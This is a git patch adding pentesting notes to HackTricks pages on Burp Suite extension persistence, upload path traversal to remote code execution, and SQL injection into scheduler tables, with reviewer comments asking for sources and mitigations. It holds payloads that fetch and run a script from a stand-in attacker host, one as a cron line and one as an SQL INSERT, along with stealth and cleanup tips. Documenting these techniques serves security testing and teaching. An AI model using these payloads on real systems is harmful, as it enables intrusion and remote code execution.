From 03324d8731773dad7a4f905b0eec916d93e0b581 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 31 Jan 2026 02:01:53 +0000 Subject: [PATCH] Add content from: Metasploit Wrap-Up 01/30/2026 --- .../linux-post-exploitation/README.md | 7 +++++++ src/pentesting-web/file-upload/README.md | 14 ++++++++++++++ src/pentesting-web/sql-injection/README.md | 17 +++++++++++++++++ 3 files changed, 38 insertions(+) diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 4bc1770c6f3..e99f6f8e2d6 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md 
@@ -132,6 +132,12 @@ Hardening - Overwrite the in-memory `argv[0]` buffer after reading `/proc/self/cmdline` length and the `argv[0]` pointer, padding with NULs so `/proc//cmdline` and `ps` also show the fake label. - Hunt by comparing `Name:` in `/proc//status` against the real executable path and looking for loopback mutex listeners owned by processes with tiny/blank cmdlines. +## BurpSuite extension persistence (userland) + +- Burp stores extension autoload configuration in user-level settings (e.g., `~/.BurpSuite/UserConfig*.json` on Linux/macOS or `%USERPROFILE%\.BurpSuite\` on Windows). Appending a malicious JAR/Python extension path with `autoload":true` causes Burp to execute the payload whenever the user launches BurpSuite. +- Delivery flow: drop the extension file into a writable profile directory, patch the JSON settings to add the extender entry (type, path, and enabled/autoload flags), and ensure "Automatically reload extensions on startup" is enabled in the options block. +- Persistence trigger is user-driven (opening BurpSuite), making it stealthier than system-level autoruns while still granting execution in the context of a tester’s workstation. + ## References - [0xdf – HTB Planning (Grafana env creds reuse, systemd BASIC_AUTH)](https://0xdf.gitlab.io/2025/09/13/htb-planning.html) 
@@ -139,5 +145,6 @@ Hardening - [0xdf – HTB Environment (GPG homedir relocation to decrypt loot)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) - [GnuPG Manual – Home directory and GNUPGHOME](https://www.gnupg.org/documentation/manuals/gnupg/GPG-Configuration-Options.html#index-homedir) - [Inside GoBruteforcer: AI-generated server defaults, weak passwords, and crypto-focused campaigns](https://research.checkpoint.com/2026/inside-gobruteforcer-ai-generated-server-defaults-weak-passwords-and-crypto-focused-campaigns/) +- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md index c867f900174..f43bd3fe43f 100644 --- a/src/pentesting-web/file-upload/README.md +++ b/src/pentesting-web/file-upload/README.md 
@@ -549,6 +549,19 @@ Content-Type: application/json Backend copies `file.filepath`, so the response returns that path’s content. Common chain: read `/proc/self/environ` to learn `$HOME`, then `$HOME/.n8n/config` for keys and `$HOME/.n8n/database.sqlite` for user identifiers. +### Path traversal on upload destination (arbitrary file write → RCE) + +If the upload handler uses an attacker-controlled path component (e.g., a `guid`/`path` parameter) to build the destination, path traversal converts the upload into **arbitrary file write**: + +- **Windows:** traverse into the webroot (e.g., `../../inetpub/wwwroot/shell.aspx`) and write a webshell that the attacker triggers over HTTP. +- **Linux:** traverse to `/etc/cron.d/` and drop a cron entry that executes commands as root when cron parses the file: + +```cron +* * * * * root /bin/bash -c 'curl http://attacker/p.sh|bash' +``` + +- Ensure the request sets the traversal inside the server-side path segment, not just the filename field, and keep payload size small to avoid logging throttles. This turns a pre-auth upload into code execution even when the handler was intended for benign blobs only. + ## References - [n8n form upload Content-Type confusion → arbitrary file read PoC](https://github.com/Chocapikk/CVE-2026-21858) 
@@ -567,6 +580,7 @@ Backend copies `file.filepath`, so the response returns that path’s content. C - [CVE-2024-21546 – NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546) - [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca) - [0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html) +- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026) - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) - [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink) - [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html) diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 53ba19bf313..4ca6fa847d9 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md 
@@ -659,6 +659,22 @@ Mitigations: https://github.com/m4ll0k/Atlas {{#endref}} +### SQLi as a write primitive to scheduler/cron tables (RCE) + +If an authenticated endpoint is reachable pre-auth via an **auth bypass** and contains SQLi, treat the database as a **write primitive** instead of just data exfil: + +- Target scheduler tables (e.g. `cron_job`, `task_queue`, `jobs`) that the application daemon periodically executes. Insert a row that runs your command and mark it enabled/active. +- Example payload (conceptual – adapt to the schema): + +```sql +INSERT INTO cron_job (id, name, command, enabled, nextrun) +VALUES (1337, 'healthcheck', 'bash -c "curl http://attacker/p.sh|bash"', 1, NOW()); +``` + +- Some apps sanitize job names but not the command body; keep the command small and pull a second stage over HTTP(S). +- After the scheduler tick runs, you gain OS command execution even when direct stacked queries/`xp_cmdshell` aren’t possible. +- Cleanup: delete the job or set `enabled=0` once a session is established to reduce noise. + ## Other Guides - [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com) @@ -674,5 +690,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt ## References - [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/) +- [Metasploit Wrap-Up 01/30/2026](https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-01-30-2026) {{#include ../../banners/hacktricks-training.md}}
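Review bot: In the hunk `@@ -132,6 +132,12 @@` of src/linux-hardening/linux-post-exploitation/README.md, the fragment `autoload":true` in the first new bullet is not valid JSON (the key has no opening quote); write it as `"autoload": true`. The same bullet asserts concrete paths (`~/.BurpSuite/UserConfig*.json`, `%USERPROFILE%\.BurpSuite\`) and the option label "Automatically reload extensions on startup" without pointing at the Metasploit wrap-up or Burp documentation that confirms them, so either cite the source next to them or mark them as approximate. The new section also breaks with the bullets directly above it, which pair each technique with a hunt line (`Hunt by comparing ...`); add a closing detection bullet, e.g. monitor the user-level `.BurpSuite` settings files for modification and alert on extension entries whose path points to a location the tester did not install from.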
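Review bot: In the hunk `@@ -549,6 +549,19 @@` of src/pentesting-web/file-upload/README.md, the Linux bullet states that the dropped `/etc/cron.d/` entry "executes commands as root when cron parses the file" but never says what the upload handler must run as or what ownership and mode the written file ends up with, both of which decide whether cron will read it at all; state that precondition or soften the "as root" wording. The final bullet's "keep payload size small to avoid logging throttles" is supported by nothing in the section and reads as a guess; drop it or cite where it comes from. The section also names the root cause (a request-controlled `guid`/`path` component reaching the destination path) without giving a fix; add one mitigation line, e.g. build the destination from a fixed base directory plus a server-generated name, resolve the result and reject it if it does not remain under that base, and never take a directory component from the request.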
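Review bot: In the hunk `@@ -659,6 +659,22 @@` of src/pentesting-web/sql-injection/README.md, the INSERT example is labelled "conceptual" yet its table and column names (`cron_job`, `id`, `name`, `command`, `enabled`, `nextrun`) and the `NOW()` call read as a real schema, while the bullet above lists the table names only as "e.g."; either name the application and Metasploit module the pattern was taken from, or say in the bullet that the identifiers are placeholders and that `NOW()` is dialect-specific. The claim "Some apps sanitize job names but not the command body" is unsourced; cite the case or remove it. The hunk's context line reads `Mitigations:`, so this file pairs techniques with fixes, but the new section offers none; add a bullet noting that the application's database account should not hold INSERT/UPDATE rights on scheduler tables, and that defenders can audit those tables for rows whose command text was never created through the application's own UI.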